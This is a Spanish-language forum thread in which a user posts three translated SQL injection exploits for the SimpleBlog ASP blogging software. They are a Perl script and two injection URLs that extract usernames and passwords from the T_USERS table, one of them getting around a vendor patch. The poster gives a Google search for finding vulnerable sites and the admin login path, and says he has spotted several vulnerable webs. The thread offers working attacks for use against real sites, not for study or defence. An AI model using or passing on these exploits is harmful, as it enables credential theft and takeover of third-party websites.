Resultados 1 al 6 de 6

SimpleBlog, un blog?

  1. #1 SimpleBlog, un blog? 
    pronx
    Invitado
    Simpleblog es un sistema en ASP de "blogging". Este tiene varias vulnerabilidades. Búsquen en Google: "Powered by SimpleBlog 2.0". La versión 2.0 es una de las más xploitables.
    Les pongo los xploits..
    Citar  
     

  2. #2 Exploit 1 (traducido por mi mismo, sacado de milw0rm) 
    pronx
    Invitado
    Código:
    #!/usr/bin/perl
    #Traducido por pronX
    #Uso: el_exploit.pl <host> <ruta> <id>
    use IO::Socket;
    if(@ARGV != 3) { usage(); }
    else { exploit(); }
    sub header()
    {
      print " *****Exploit de inyección SQL en SimpleBlog 2.0***** \r\n";
      print "      *****Windows apesta!***** \r\n";
      }
    sub usage() 
    {
      header();
      print " *Uso: $0 <host> <ruta> <id>\r\n";
      print " *<host> = Host de la víctima ej: elblog.com\r\n";
      print " *<ruta> = Ruta del SimpleBlog ej: /simpleblog/\r\n";
      print " *<id>   = ID del usuario ya sea admin o otro ej: 1\r\n";
      exit();
    }
    sub exploit () 
    {
      $simserver = $ARGV[0];
      $simserver =~ s/(http:\/\/)//eg;
      $simhost   = "http://".$simserver;
      $simdir    = $ARGV[1];
      $simport   = "80";
      $simtar    = "comments.asp?id=";
      $simsql    = "-1%20UNION%20SELECT%20ID,uFULLNAME,uUSERNAME,uPASSWORD,uEMAIL,uDATECREATED,null,null%20FROM%20T_USERS%20WHERE%20id%20like%20".$ARGV[2];
      $simreq    = $simhost.$simdir.$simtar.$simsql;
     
      header();
      print "- Intentando de conectar: $simserver\r\n";
      $sim = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$simserver", PeerPort => "$simport") || die "- Falló la conexión...\n";
      print $sim "GET $simreq HTTP/1.1\n";
      print $sim "Accept: */*\n";
      print $sim "Referer: $simhost\n";
      print $sim "Accept-Language: tr\n";
      print $sim "User-Agent: Mozzilla\n";
      print $sim "Cache-Control: no-cache\n";
      print $sim "Host: $simserver\n";
      print $sim "Connection: close\n\n";
      print "Conectado...\r\n";
      while ($answer = <$sim>) {
        if ($answer =~ /class=\"c_content\">(.*?)<\/td><\/tr>/) { 
          if ($1 == $ARGV[2]) {
            print "Se ve vulnerable :)\r\n";
          }
          else { die "- Falló el exploit\n"; }     
        }
        if ($answer =~ /class=\"c_content\"><b>(.*)<\/b>/) {
          print "- Usuario: $1\r\n";
        }
        if ($answer =~ /href=\"mailto:(.*?)\">(.*?)<\/a>/) {
    	  print "- Contraseña: $1\r\n";
        }  
      }
      
     
     
    }
    Citar  
     

  3. #3 Exploit 2 (traducido por mi mismo) 
    pronx
    Invitado
    Exploit de Inyección SQL en el SimpleBlog 2.0 <=, en el archivo "comments.asp".
    Agradecimientos a: Chironex Fleckeri
    Contacto: [email protected]
    Búsquen en Google: Powered By SimpleBlog 2.0
    --
    http://www.objetivo.com/ruta_al_blog/comments.asp?id=-1 UNION SELECT ID,uFULLNAME,uUSERNAME,uPASSWORD,uEMAIL,uDATECREAT ED,null,null FROM T_USERS WHERE id=1
    --
    Al panel de administración, lo podemos encontrar en:
    --
    http://www.objetivo.com/ruta_al_blog/admin/login.asp
    --
    PD: a mí solo me anduvo el Exploit 1, que es un script en Perl en los blogs que probé.
    Citar  
     

  4. #4 Exploit 3 (traducido por mi mismo también) 
    pronx
    Invitado
    Exploit por: Vipsta y MurderSkillz
    Nombre de la aplicación: SimpleBlog 2.3
    Autor de la aplicación: 8pixel.net
    Versión: <= 2.3
    Tipo: Blog
    -- Detalles --
    Vulnerabilidad: Inyección SQL remota
    Requerimientos: Base de datos con soporte para la instrucción UNION
    Revisiones: Nota, esta es una revision de otra vulnerabilidad posteada por Chironex Fleckeri
    --Código--
    Los autores "implementaron" un parche para las vulnerabilidades de Inyección SQL, sin embargo esta mier** fue fácilmente estudiada por Vipsta y MurderSkillz.
    Los autores intentaron remover los caracteres ilegales como ' y = que detienen las inyecciones sql. Sin embargo fallaron en eliminar el simbolo ">". jaja.
    --Vamos al grano--
    http://www.objetivo.com/ruta_al_blog/default.asp?view=plink&id=-1%20UNION%20SELECT%20ID,uFULLNAME,uUSERNAME,uPASSW ORD,uEMAIL,uDATECREATED,null,null,null%20FROM%20T_ USERS%20WHERE%20id>1
    --
    jeje muy bueno está.
    Citar  
     

  5. #5  
    Avanzado
    Fecha de ingreso
    Jun 2006
    Ubicación
    Donde vivo
    Mensajes
    338
    Descargas
    0
    Uploads
    0
    deve de ser un currazo todo esto.
    porcierto, hay algun exploid q no hayas traducido tu?? xD
    Ojo por ojo y el mundo se quedará ciego.
    Citar  
     

  6. #6  
    pronx
    Invitado
    jaja, yo lo traduje todo. pero solo aquí en el foro para la comunidad. (-;
    Pero están muy buenos. Ya vi varias webs vulnerables.
    Citar  
     

Temas similares

  1. Sobre blog
    Por jarope en el foro DIGITAL+
    Respuestas: 3
    Último mensaje: 23-06-2009, 17:58
  2. Un blog que da asco
    Por Tiana en el foro CIBERACTIVISMO
    Respuestas: 15
    Último mensaje: 14-02-2007, 10:52
  3. Nuke+Blog
    Por Uleila.com en el foro PROGRAMACION WEB
    Respuestas: 1
    Último mensaje: 04-04-2005, 23:20
  4. Crear un portal y un blog
    Por Almorca en el foro PROGRAMACION WEB
    Respuestas: 3
    Último mensaje: 27-05-2004, 11:20

Marcadores

Marcadores